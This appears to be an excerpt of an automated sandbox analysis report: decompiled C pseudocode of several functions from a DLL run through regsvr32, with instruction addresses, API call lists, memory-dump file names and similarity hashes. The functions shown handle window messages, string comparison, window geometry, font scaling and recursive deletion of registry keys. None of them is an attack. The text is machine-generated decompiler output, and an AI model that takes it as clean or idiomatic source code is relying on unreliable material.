					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E10043FC9(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E10013FEA(0, _t51, _t58, GetCapture());
								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E10043FC9(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t59;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E10043FFD(_t51, _t56);
							} else {
								E10043F4D(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_t54 = _t57;
							if(__eflags == 0) {
								E100442BA(0, _t58, __eflags);
							} else {
								E100441B6(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1001935C();
					goto L19;
				}
			}

0x100442fe
0x100442fe
0x10044307
0x1004430d
0x10044313
0x100443ed
0x00000000
0x100443ed
0x10044326
0x10044336
0x100443e6
0x100443e8
0x00000000
0x1004433c
0x1004433e
0x10044356
0x1004435b
0x100443bb
0x100443c1
0x100443c8
0x100443ca
0x100443ca
0x100443cf
0x100443d3
0x100443d5
0x100443d8
0x100443dd
0x100443e0
0x00000000
0x00000000
0x100443e0
0x00000000
0x100443d3
0x1004435d
0x1004435e
0x100443a6
0x100443ac
0x100443b2
0x100443b4
0x100443b4
0x00000000
0x100443ac
0x10044360
0x10044365
0x1004437f
0x10044382
0x10044385
0x1004438b
0x1004438c
0x1004438d
0x1004438f
0x10044391
0x10044394
0x10044396
0x1004439f
0x10044398
0x10044398
0x10044398
0x00000000
0x10044396
0x10044368
0x10044369
0x100443fe
0x10044404
0x10044406
0x1004440f
0x10044408
0x10044408
0x10044408
0x00000000
0x10044416
0x10044371
0x00000000
0x00000000
0x10044377
0x00000000
0x10044377
0x100443f4
0x100443f7
0x00000000
0x100443f7

APIs

GetCapture.USER32 ref: 1004430F
SetCapture.USER32(?), ref: 1004431F
GetCapture.USER32 ref: 1004432B
GetMessageA.USER32 ref: 10044345
DispatchMessageA.USER32 ref: 10044377
GetCapture.USER32 ref: 100443D5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
Instruction ID: 038cb224890085f827a759f96853b5fd9b84b1ba0a667fefa5421cfc8a7f22d1
Opcode Fuzzy Hash: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
Instruction Fuzzy Hash: C131B474A0020ADBDB50DFA488859AF77F9EB44A82F734439F445D2161CE70EE44D66A

Uniqueness

Uniqueness Score: -1.00%

Function 100010D7 Relevance: 9.1, APIs: 6, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100010D7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				char* _t26;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t50;
				void* _t53;
				char* _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t61;

				_t53 = __edx;
				E100476B6(0x1008d74b, __ebx, __edi, __esi);
				_t25 =  *0x100bb480(0xc);
				_t55 = 0;
				_t50 = _t25;
				 *((intOrPtr*)(_t60 - 0x18)) = 0;
				_t58 = lstrlenW;
				 *((intOrPtr*)(_t60 - 4)) = 0;
				if( *(_t60 + 0x10) != 0) {
					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x10)) + 1;
					_t43 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x10)) + 1, 2);
					_t61 = _t61 + 0xc;
					if(_t43 < 0) {
						L8:
						_push(0x8007000e);
						L10001401(_t50, _t51, _t53, _t55, _t58, _t60);
					} else {
						_t56 =  *((intOrPtr*)(_t60 - 0x14));
						_t66 = _t56 - 0x400;
						if(_t56 > 0x400) {
							L6:
							_t51 = _t60 - 0x18;
							_t44 = L100012BC(_t50, _t60 - 0x18, _t53, _t56, __eflags, _t56);
						} else {
							_t46 = L10001492(_t50, _t53, _t56, lstrlenW, _t66);
							_t51 = _t56;
							if(_t46 == 0) {
								goto L6;
							} else {
								E10048380(_t56);
								_t44 = _t61;
							}
						}
						_t55 = L100010B4(_t44,  *(_t60 + 0x10), _t56, _t50);
						if(_t55 == 0) {
							goto L8;
						}
					}
				}
				_t26 = 0;
				if( *(_t60 + 0x18) != 0) {
					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x18)) + 1;
					_t34 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x18)) + 1, 2);
					_t61 = _t61 + 0xc;
					if(_t34 < 0) {
						goto L8;
					} else {
						_t58 =  *((intOrPtr*)(_t60 - 0x14));
						_t71 = _t58 - 0x400;
						if(_t58 > 0x400) {
							L14:
							_t51 = _t60 - 0x18;
							_t36 = L100012BC(_t50, _t60 - 0x18, _t53, _t55, __eflags, _t58);
						} else {
							_t37 = L10001492(_t50, _t53, _t55, _t58, _t71);
							_t51 = _t58;
							if(_t37 == 0) {
								goto L14;
							} else {
								E10048380(_t58);
								_t36 = _t61;
							}
						}
						_t26 = L100010B4(_t36,  *(_t60 + 0x18), _t58, _t50);
						if(_t26 == 0) {
							goto L8;
						}
					}
				}
				L10001389(CompareStringA( *(_t60 + 8),  *(_t60 + 0xc), _t55,  *(_t60 + 0x14), _t26,  *(_t60 + 0x1c)), _t60 - 0x18);
				return E10047739(_t50, _t55, _t27);
			}

0x100010d7
0x10002395
0x1000239a
0x100023a0
0x100023a2
0x100023a4
0x100023aa
0x100023b0
0x100023b3
0x100023be
0x100023c5
0x100023ca
0x100023cf
0x1000240c
0x1000240c
0x10002411
0x100023d1
0x100023d1
0x100023d4
0x100023da
0x100023f2
0x100023f3
0x100023f6
0x100023dc
0x100023dd
0x100023e4
0x100023e5
0x00000000
0x100023e7
0x100023e9
0x100023ee
0x100023ee
0x100023e5
0x10002406
0x1000240a
0x00000000
0x00000000
0x1000240a
0x100023cf
0x10002416
0x1000241b
0x10002426
0x1000242d
0x10002432
0x10002437
0x00000000
0x10002439
0x10002439
0x1000243c
0x10002442
0x1000245a
0x1000245b
0x1000245e
0x10002444
0x10002445
0x1000244c
0x1000244d
0x00000000
0x1000244f
0x10002451
0x10002456
0x10002456
0x1000244d
0x10002469
0x10002470
0x00000000
0x00000000
0x10002470
0x10002437
0x1000248b
0x1000249a

APIs

__EH_prolog3_GS.LIBCMT ref: 10002395
lstrlenW.KERNEL32(?), ref: 100023B8
__alloca_probe_16.LIBCMT ref: 100023E9
lstrlenW.KERNEL32(?), ref: 10002420
__alloca_probe_16.LIBCMT ref: 10002451
CompareStringA.KERNEL32(?,?,00000000,?,00000000,?), ref: 10002480

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16lstrlen$CompareH_prolog3_String
String ID:
API String ID: 1160588780-0
Opcode ID: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
Instruction ID: 96e6864510ac77364847bf10cd6c9172ca1897ca378224d80866f79966e83715
Opcode Fuzzy Hash: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
Instruction Fuzzy Hash: EC318F7590011AABEF01DFA08D46AEF3BA9EF402D0F114125FE01E2156DB34AE61D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 10001500 Relevance: 9.1, APIs: 6, Instructions: 93
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10001500(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t24;
				CHAR* _t25;
				void* _t33;
				void* _t34;
				void* _t41;
				void* _t42;
				void* _t54;
				CHAR* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				void* _t65;

				_t54 = __edx;
				E100476B6(0x1008d783, __ebx, __edi, __esi);
				_t24 =  *0x100bb480(0x10);
				_t56 = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) = _t24;
				 *((intOrPtr*)(_t62 - 0x18)) = 0;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				if( *(_t62 + 0xc) != 0) {
					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 0xc)) + 1;
					_t41 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 0xc)) + 1, 2);
					_t63 = _t63 + 0xc;
					if(_t41 >= 0) {
						_t57 =  *((intOrPtr*)(_t62 - 0x14));
						_t69 = _t57 - 0x400;
						if(_t57 > 0x400) {
							L6:
							_t42 = L100012BC(0x400, _t62 - 0x18, _t54, _t57, __eflags, _t57);
						} else {
							_push(_t57);
							if(L10001492(0x400, _t54, _t57, lstrlenW, _t69) == 0) {
								goto L6;
							} else {
								E10048380(_t57);
								_t42 = _t63;
							}
						}
						_t56 = L100010B4(_t42,  *(_t62 + 0xc), _t57,  *((intOrPtr*)(_t62 - 0x1c)));
					}
				}
				_t25 = 0;
				if( *(_t62 + 8) != 0) {
					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 8)) + 1;
					_t33 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 8)) + 1, 2);
					_t65 = _t63 + 0xc;
					if(_t33 >= 0) {
						_t61 =  *((intOrPtr*)(_t62 - 0x14));
						__eflags = _t61 - 0x400;
						if(__eflags > 0) {
							L14:
							_t34 = L100012BC(0x400, _t62 - 0x18, _t54, _t56, __eflags, _t61);
						} else {
							_push(_t61);
							__eflags = L10001492(0x400, _t54, _t56, _t61, __eflags);
							if(__eflags == 0) {
								goto L14;
							} else {
								E10048380(_t61);
								_t34 = _t65;
							}
						}
						_t25 = L100010B4(_t34,  *(_t62 + 8), _t61,  *((intOrPtr*)(_t62 - 0x1c)));
					} else {
						_t25 = 0;
					}
				}
				L10001389(lstrcmpiA(_t25, _t56), _t62 - 0x18);
				return E10047739(0x400, _t56, _t26);
			}

0x10001500
0x10002511
0x10002516
0x1000251c
0x1000251e
0x10002521
0x1000252d
0x10002535
0x10002540
0x10002547
0x1000254c
0x10002551
0x10002553
0x10002556
0x10002558
0x10002570
0x10002574
0x1000255a
0x1000255a
0x10002563
0x00000000
0x10002565
0x10002567
0x1000256c
0x1000256c
0x10002563
0x10002586
0x10002586
0x10002551
0x10002588
0x1000258d
0x10002598
0x1000259f
0x100025a4
0x100025a9
0x100025af
0x100025b2
0x100025b4
0x100025cc
0x100025d0
0x100025b6
0x100025b6
0x100025bc
0x100025bf
0x00000000
0x100025c1
0x100025c3
0x100025c8
0x100025c8
0x100025bf
0x100025dd
0x100025ab
0x100025ab
0x100025ab
0x100025a9
0x100025ef
0x100025fe

APIs

__EH_prolog3_GS.LIBCMT ref: 10002511
lstrlenW.KERNEL32(?), ref: 1000253A
__alloca_probe_16.LIBCMT ref: 10002567
lstrlenW.KERNEL32(?), ref: 10002592
__alloca_probe_16.LIBCMT ref: 100025C3
lstrcmpiA.KERNEL32(00000000,00000000), ref: 100025E4

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16lstrlen$H_prolog3_lstrcmpi
String ID:
API String ID: 1103306039-0
Opcode ID: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
Instruction ID: 9d3677159b335e25cff1d48c936262dc40f9816cf0325abab7cf80bf5a6e2688
Opcode Fuzzy Hash: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
Instruction Fuzzy Hash: 08218F75D0051AAAEF00EBA08C569EF7BB9EF44281F114025FD05F715AEA30AF51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1003E100 Relevance: 9.1, APIs: 6, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003E100(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E1004764D(0x100917b7, __ebx, __edi, __esi);
				_t78 = __ecx;
				L1000CDFE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				L1000C8F5(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E1000BF2B(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E1000BFAF(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E10047725(L1000CE52(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}

0x1003e100
0x1004302a
0x1004302f
0x10043035
0x1004303a
0x10043045
0x10043052
0x1004305e
0x10043079
0x10043082
0x10043097
0x100430a5
0x100430b2
0x100430c1
0x100430d3
0x100430d9
0x100430ea

APIs

__EH_prolog3.LIBCMT ref: 1004302A

Part of subcall function 1000CDFE: __EH_prolog3.LIBCMT ref: 1000CE05
Part of subcall function 1000CDFE: GetWindowDC.USER32(00000000), ref: 1000CE31

GetClientRect.USER32 ref: 10043045
GetWindowRect.USER32 ref: 10043052

Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D93), ref: 1000C909
Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D9B), ref: 1000C912

OffsetRect.USER32 ref: 10043079

Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF50
Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF65

OffsetRect.USER32 ref: 10043097

Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFD4
Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFE9

SendMessageA.USER32 ref: 100430C1

Part of subcall function 1000CE52: __EH_prolog3.LIBCMT ref: 1000CE59
Part of subcall function 1000CE52: ReleaseDC.USER32(?,00000000), ref: 1000CE76

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2952362992-0
Opcode ID: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
Instruction ID: c88571772fa0b80cc6a0098a865d4c4e15fcb43bc89952879f8554f4dc41fe22
Opcode Fuzzy Hash: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
Instruction Fuzzy Hash: 1C21D67691051AEFDB19DBA4CC95DFEB3B8FF08300F004269E656A31A0DB246A06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10027605 Relevance: 9.1, APIs: 6, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E10027605(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t8;
				char* _t14;
				void* _t24;
				int _t25;
				void* _t34;
				char* _t35;
				void* _t36;
				signed int _t38;

				_t34 = __edx;
				_t8 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t8 ^ _t38;
				_t35 = L1004C810(_a4);
				if(_t35 != 0) {
					_t14 =  &(_t35[lstrlenA(_t35)]);
					if(_t14 != 0) {
						_push(_t36);
						_push(_t24);
						while(1) {
							 *_t14 = 0;
							E1004D4A9(_t35, _t14);
							if(RegOpenKeyA(0x80000000, _t35,  &_v276) != 0) {
								break;
							}
							_t25 = 0;
							if(RegEnumKeyA(_v276, 0,  &_v272, 0x105) == 0) {
								_t25 = 1;
							}
							RegCloseKey(_v276);
							if(_t25 == 0) {
								RegDeleteKeyA(0x80000000, _t35);
								_t14 = E1004D3FF(_t35, 0x5c);
								_t46 = _t14;
								if(_t14 != 0) {
									continue;
								}
							}
							break;
						}
						_pop(_t24);
						_pop(_t36);
					}
					_push(_t35);
					E100470E9(_t24, _t35, _t36, _t46);
				}
				return E1004763E(1, _t24, _v8 ^ _t38, _t34, _t35, _t36);
			}

0x10027605
0x1002760e
0x10027615
0x10027622
0x10027627
0x10027634
0x10027636
0x10027638
0x1002763e
0x1002763f
0x10027641
0x10027644
0x1002765c
0x00000000
0x00000000
0x1002766a
0x1002767b
0x1002767d
0x1002767d
0x10027684
0x1002768c
0x10027690
0x10027699
0x1002769e
0x100276a2
0x00000000
0x00000000
0x100276a2
0x00000000
0x1002768c
0x100276a4
0x100276a5
0x100276a5
0x100276a6
0x100276a7
0x100276af
0x100276bc

APIs

__strdup.LIBCMT ref: 1002761D
lstrlenA.KERNEL32(00000000), ref: 1002762E

Part of subcall function 1004D4A9: __mbsdec_l.LIBCMT ref: 1004D4B3

RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10027654
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10027673
RegCloseKey.ADVAPI32(?), ref: 10027684
RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10027690

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumOpen__mbsdec_l__strduplstrlen
String ID:
API String ID: 2107731021-0
Opcode ID: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
Instruction ID: 60820bd84a7cae173fc4976681b347de2981e602b7a1f39c4aa5d16319027221
Opcode Fuzzy Hash: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
Instruction Fuzzy Hash: F011C4356005196EE315DBA8DC89FEB7BECEF46649F2100AAF909D2040DF74AD418A69

Uniqueness

Uniqueness Score: -1.00%

Function 100201CD Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100201CD(intOrPtr __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				void _v68;
				int _v72;
				struct tagPOINT _v76;
				struct HWND__* _v80;
				struct tagPOINT _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t25;
				int _t29;
				struct HDC__* _t42;
				signed int _t44;
				void* _t50;
				void* _t55;
				void* _t56;
				signed int _t57;

				_t50 = __edx;
				_t23 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t23 ^ _t57;
				_t25 = _a8;
				_t55 = _a4;
				_v92 = __ecx;
				_v88 = _t25;
				if(_t25 == 0) {
					_t42 = GetDC(0);
				} else {
					_t42 =  *(_t25 + 8);
				}
				_t44 = 0xf;
				memcpy( &_v68, _t55, _t44 << 2);
				_t29 = MulDiv(GetDeviceCaps(_t42, 0x5a), _v68, 0x2d0);
				_t56 = DPtoLP;
				_v72 = _t29;
				_v76 = 0;
				DPtoLP(_t42,  &_v76, 1);
				_v84 = 0;
				_v80 = 0;
				DPtoLP(_t42,  &_v84, 1);
				_v68 =  ~(E10049165(_v72 - _v80));
				if(_v88 == 0) {
					ReleaseDC(0, _t42);
				}
				return E1004763E(E1001E424(_v92,  &_v68), _t42, _v8 ^ _t57, _t50, 0, _t56);
			}

0x100201cd
0x100201d3
0x100201da
0x100201dd
0x100201e4
0x100201e8
0x100201eb
0x100201ee
0x100201fd
0x100201f0
0x100201f0
0x100201f0
0x10020201
0x1002020a
0x10020219
0x1002021f
0x10020225
0x10020231
0x10020234
0x1002023d
0x10020240
0x10020243
0x10020257
0x1002025a
0x1002025e
0x1002025e
0x1002027e

APIs

GetDC.USER32(00000000), ref: 100201F7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020212
MulDiv.KERNEL32 ref: 10020219
DPtoLP.GDI32(00000000,?,00000001), ref: 10020234
DPtoLP.GDI32(00000000,?,00000001), ref: 10020243
ReleaseDC.USER32(00000000,00000000), ref: 1002025E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-0
Opcode ID: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
Instruction ID: 9876b56e36250cf60ecf2c55abee1cb27d42b24326faa1459ea02bd52087e0db
Opcode Fuzzy Hash: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
Instruction Fuzzy Hash: C1210775E00218AFDB00DFE5DC899AEBBB9FB49300F50001AF505EB291CB74A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B312 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B312(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
